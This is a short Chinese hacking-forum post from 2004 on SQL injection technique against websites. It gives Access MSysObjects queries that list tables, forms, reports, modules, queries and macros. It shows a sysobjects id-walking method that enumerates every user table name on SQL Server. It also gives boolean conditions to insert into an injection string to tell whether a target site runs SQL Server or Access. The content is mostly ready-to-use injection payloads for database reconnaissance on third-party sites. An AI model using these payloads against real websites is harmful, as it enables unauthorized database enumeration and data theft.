频道栏目
首页 > 安全 > 网站安全 > 正文

我的注入方法之个人见解!!!

2004-10-17 20:43:18           
收藏   我要投稿

黑基会员:visun

使用直接的查询语句获取ACCESS数据库中的表名/窗体/报表/模块/查询/宏
---------------------------------------------------------------------------
查询:
SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)=5 ORDER BY MSysObjects.Name;


窗体:
SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)=-32768 ORDER BY MSysObjects.Name;


表:
SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (Left$([Name],4) <> "Msys") AND (MSysObjects.Type)=1 ORDER BY MSysObjects.Name;


报表:
SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)= -32764 ORDER BY MSysObjects.Name;


模块:
SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)= -32761 ORDER BY MSysObjects.Name;


宏:
SELECT MSysObjects.Name FROM MsysObjects WHERE (Left([Name],1)<>"~") AND (MSysObjects.Type)= -32766 ORDER BY MSysObjects.Name;
 

使用直接的查询语句获取SQL数据库表名的方法
-----------------------------------------------------------------------
我们马上就可以得到该数据库下用户表的第一个表名gallery的对象标志2099048
select top 1 name from sysobjects where xtype=u and id>2099048
再得到第2个表名gb_data,这里用到的是id>2099048,因为对象标志id是根据由小到大排列的
以此类推,我们可以得到所有的用户表的名字了

 

使用数据库的系统表对象来判断网站中使用的是何种数据库格式(SQL/ACCESS)
-----------------------------------------------------------------------
我们可以在注入串中加上一个查询语句:
(select count(*) from sysobjects)>=0
如果查询结果成立,即是使用SQL数据库的,反之否.


加以下语句可判断是否为ACCESS:
(select count(*) from Msysaccessobjects)>=0
如果查询结果成立,即是ACCESS数据库,反之否.

相关TAG标签 见解 方法 个人
上一篇:脚本后门注入图片新方法
下一篇:SQL注入葵花宝典(基础篇)
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站